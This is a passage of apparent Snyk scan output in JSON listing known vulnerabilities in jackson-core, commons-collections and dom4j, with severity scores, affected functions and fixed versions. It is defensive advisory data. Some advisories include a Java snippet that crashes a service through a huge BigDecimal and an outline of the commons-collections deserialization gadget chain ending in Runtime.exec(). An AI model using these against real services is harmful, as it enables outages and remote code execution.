For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-01-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:01.546686Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-core@2.8.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", - "title": "Denial of Service (DoS)", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "gmethwin@github" - ], - "semver": { - "vulnerable": [ - "[2.3.0-rc1,2.7.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", - "className": "UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", - "className": "WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-core/issues/315", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:48.004490Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-08-25T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:55:48.004490Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-core@2.7.7" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of 
Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - 
"assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## 
Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. 
Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - 
"name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - 
"severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": 